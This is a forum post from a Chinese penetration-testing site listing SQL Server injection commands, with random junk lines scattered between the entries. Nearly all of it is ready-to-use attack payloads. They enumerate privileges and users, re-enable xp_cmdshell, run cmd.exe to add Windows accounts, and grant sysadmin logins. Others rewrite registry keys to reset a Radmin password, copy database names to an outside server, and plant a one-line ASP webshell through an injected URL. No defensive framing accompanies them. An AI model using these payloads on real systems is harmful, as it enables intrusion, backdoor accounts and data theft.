中国网络渗透测试联盟
标题:
阿D常用的一些注入命令
[打印本页]
作者:
admin
时间:
2012-9-13 17:26
标题:
阿D常用的一些注入命令
阿D常用的一些注入命令
0 n0 w7 t1 q8 N3 [6 \1 R: M. w
//看看是什么权限的
- _! t: s* |5 ?, S; ^$ i- n0 r
and 1=(Select IS_MEMBER('db_owner'))
5 X |2 z, K5 i0 Q8 U( P! T, K
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
2 ^7 R; R N/ _
n$ [! R' C: V4 U4 u
//检测是否有读取某数据库的权限
+ E4 |: m9 U. A8 y. E! G5 c$ u- F
and 1= (Select HAS_DBACCESS('master'))
; q) K4 x6 R6 Y- e3 @' U6 w& y
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
' B4 D* Q9 e& C6 n/ O
! }( v$ ]. o& y/ T( f
# s+ y1 I! \0 ], |* [
数字类型
/ C. ]& G) ^: g; v5 x+ O
and char(124)%2Buser%2Bchar(124)=0
' T, D5 w6 |+ L2 D ?6 u
* W+ i- J& E9 `5 o- P8 X, E' g
字符类型
; M' f8 N# W& A
' and char(124)%2Buser%2Bchar(124)=0 and ''='
) P/ ~5 }4 o# D' c
/ d ? O' `. T4 p1 n- g
搜索类型
! ~0 k8 U t" k0 H! z! S
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
2 } `& T# U; u0 s
+ s3 `' C* d; `
爆用户名
3 ^5 s% C, b: n g
and user>0
7 V. M! B! c+ x
' and user>0 and ''='
5 P& J0 r- R' M$ a8 S N o. q' ^, A
9 J" J7 T7 R; F% f. y* t7 J! o
检测是否为SA权限
0 s3 E2 H; U8 h5 i0 j
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
8 I1 l0 H/ t; Z% i% ^, y; s/ J
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
" U: _( a& u+ k' J' R B
; L6 }5 g3 `+ l e9 z) v
检测是不是MSSQL数据库
V- ]! x( O5 f8 m) {2 P1 o
and exists (select * from sysobjects);--
. v$ [. F# V: R: H
% c; C2 b3 A0 b1 V% w0 N( o0 Z
检测是否支持多行
1 C4 a2 @4 N3 }& R: G! J+ I
;declare @d int;--
" |; Q* r# n. H0 N( n7 v8 ?: X
) A8 Q- T2 B9 \, ^5 N
恢复 xp_cmdshell
8 n. Z0 E" ?) N0 O; [8 H) r
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
# K2 Y5 n, O8 v7 t w# |% J
$ Q' R" R4 _; m/ ]' g+ |
/ D0 @ ]* H6 b& i
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
W: F: u6 l7 d- D6 ~
" y+ h& ]0 ~( `) w
//-----------------------
0 q7 f& u% e. r$ o; j
// 执行命令
+ ~6 a1 m9 \* C
//-----------------------
# t- E* N; J1 c& y3 v
首先开启沙盘模式:
9 s* h% U, d0 Q5 Y+ T' e6 o
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
: `& s0 N+ T; w+ S7 j) \; c
, k' e3 ]2 }0 j6 f, r
然后利用jet.oledb执行系统命令
+ ]5 C5 i1 b6 e) }. \7 w
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
8 P) K' A$ Z1 [7 F
`8 t& O- g/ s4 a
执行命令
' Y0 m+ G {! @! {5 q( X; D8 q
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
/ S/ v% q* l6 @5 Y+ ]3 L- d* ?
; ]7 j# g1 ]3 \! l8 H7 |' v
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
$ Z6 N# z z! e3 M& B: ?
% `- g! {# q0 m; }( B
判断xp_cmdshell扩展存储过程是否存在:
# j1 b) _, L! C, y( Y
http://192.168.1.5/display.asp?keyno=188
and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
W* `1 N" Z4 y& I( A7 T9 W
5 @7 Z* c7 q {0 [. {* O$ W
写注册表
/ b# W% I7 m9 m' J: w
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
9 x: r, T1 T' f5 C& r2 j" I
, j; t7 i9 ^8 i/ ]5 V7 D' d) D9 R
REG_SZ
! r( O D( r$ d+ y6 @3 j; M) n1 u5 }7 K
4 `) @/ f) y1 Q# P: r+ g
读注册表
9 y) b- Q. @2 n: \7 f
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
- {. }% L c2 [6 f5 a7 d
2 F; o1 F1 @% P E: N
读取目录内容
4 l1 u. j( s, o! H* K& N* U
exec master..xp_dirtree 'c:\winnt\system32\',1,1
4 D* k* v4 M0 h8 K' m, a( B+ h5 ^) l
$ ^8 Q. a, I6 I9 V+ T( Z4 U y
- r$ {1 |1 b' \" \& o
数据库备份
2 G8 W, {# r3 ?: }
backup database pubs to disk = 'c:\123.bak'
0 D, q1 Y7 t. v" e( a. k
- C. a8 I+ K) \) H
//爆出长度
0 ~$ C( |' a0 b# O0 @9 ~
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
0 S R1 f9 c! J/ r0 k+ i* i
4 o( ^& k, d- w! ]( j
. j( L+ G) L2 j5 C9 ]( {+ A3 T* {
5 z$ W' h5 N1 f+ ~
更改sa口令方法:用sql综合利用工具连接后,执行命令:
0 ]' \& q% \4 S4 Q" y8 x) _" A
exec sp_password NULL,'新密码','sa'
3 H( }9 Q2 w4 f/ A* T# r3 W1 P/ L
! F. g; A' e* [) E- b
添加和删除一个SA权限的用户test:
1 K8 c5 |5 n7 m% _
exec master.dbo.sp_addlogin test,ptlove
. B. L9 [6 k: ^1 i6 o
exec master.dbo.sp_addsrvrolemember test,sysadmin
; P! }2 @. V$ r' ]& [
, B6 d; q* K+ A9 B8 D
删除扩展存储过过程xp_cmdshell的语句:
2 w+ \9 S7 b/ m; o9 u W/ B* v. \2 p
exec sp_dropextendedproc 'xp_cmdshell'
1 I2 w: n# N5 S, F/ R& `& \: A
5 d9 K5 |' o% g" a- d/ k: g" [, q
添加扩展存储过过程
: x! D3 N4 k! D; h
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
; c Z/ A( u8 v' Q% |
GRANT exec On xp_proxiedadata TO public
3 N; b( Z }0 q7 J" U' p5 q4 H
, ]: P( `6 S c0 W
3 a9 _: d8 N; q+ V, H
停掉或激活某个服务。
% ]0 N& q1 O- q" u
; v6 O. P5 L2 n3 N, v" N9 P( R) _
exec master..xp_servicecontrol 'stop','schedule'
3 i1 C6 O# i8 g5 S" ^3 Z+ q/ y4 ~
exec master..xp_servicecontrol 'start','schedule'
5 D0 E6 i) h& s5 c- M# S
- B s2 s, a0 l% C
dbo.xp_subdirs
- p. P! S7 K+ ~
: u' p9 |% S4 N5 T5 U& e- K
只列某个目录下的子目录。
5 j. k# t9 M% g" h) f W) W
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
4 X2 @, t7 o4 f) z) h
$ t" v( L; B0 H5 c ~
dbo.xp_makecab
4 ]; f: H) e" S9 m4 U1 ?
, h/ \( w2 h1 }9 S
将目标多个档案压缩到某个目标档案之内。
, e% w7 q1 p X; C) |# F) K' u; s3 P
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
+ B6 ]. J, t/ y+ Y3 r; K
0 j5 q- \& f: B: a0 A0 e5 [
dbo.xp_makecab
7 u7 y1 U7 U) u2 a' ]0 `
'c:\test.cab','mszip',1,
/ `% Z3 S+ n* i8 M& Y6 w
'C:\Inetpub\wwwroot\SQLInject\login.asp',
4 X2 b; [* H z5 X
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
. ]4 D( d0 ]6 s( R& c l& d D: i
* m5 g, K! I! y2 o, `* f+ `
xp_terminate_process
! F& T+ e6 X' c, l: y3 L7 \0 \& V
6 Q3 g! c: F8 W( d/ M s* n( ^/ {# T
停掉某个执行中的程序,但赋予的参数是 Process ID。
+ r5 b9 Y) L* U4 T+ H. A+ @
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
2 g0 H. i/ ]0 q' H& I1 A
, {: ~ c0 I/ u3 ?5 w
xp_terminate_process 2484
( a% E* H! `9 `4 g
& e- f0 O1 n% _+ U F
xp_unpackcab
6 H8 {0 c4 M/ j, J4 a6 E+ `8 N
6 h N0 I; f, W! L, I, o
解开压缩档。
' d; B) s( @' U6 U2 x
$ \) [ h5 T L7 `1 K1 ~6 |2 t$ j
xp_unpackcab 'c:\test.cab','c:\temp',1
' ` F" B. G+ |- @! f
- E% U8 L5 i9 {( M; H7 o+ i
0 {% K: V/ f6 T5 ^
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
% m; e" M: x" p. l& W$ y) C9 V
/ R0 H: x5 J7 N$ ~
create database lcx;
$ z* s9 B. W7 s4 M. k
Create TABLE ku(name nvarchar(256) null);
0 J- `) N; m/ ~" }' a
Create TABLE biao(id int NULL,name nvarchar(256) null);
, d& b& D$ s1 Q+ K
5 A; {# ?: [) ^$ Y) b
//得到数据库名
5 k& F) w. l2 k; U
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
0 `& U) j g3 H; z5 C. J( f7 z" D- ]
, k" M- E5 M/ y# H$ u; G- a
8 a! U6 q$ B2 f+ W3 h/ O
//在Master中创建表,看看权限怎样
& C& ^6 O4 @" N( d, z
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
% r0 _% I' ^1 J# G( v
. V( P5 |! _: ~
用 sp_makewebtask直接在web目录里写入一句话马:
% G6 t& {2 b5 ]. D
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:
\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
: Q& Q% E/ m; U' ?
8 X: r+ a1 S% H+ g; _0 U
//更新表内容
% ~' x- p) i# t! c" B5 n6 P
Update films SET kind = 'Dramatic' Where id = 123
7 ^9 h: q- \: ?" G4 P0 D' A( m
! f1 J4 n$ X- ^: l, \ _6 I r
//删除内容
2 }6 f4 {2 O& V4 Y, x. F& u
delete from table_name where Stockid = 3
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2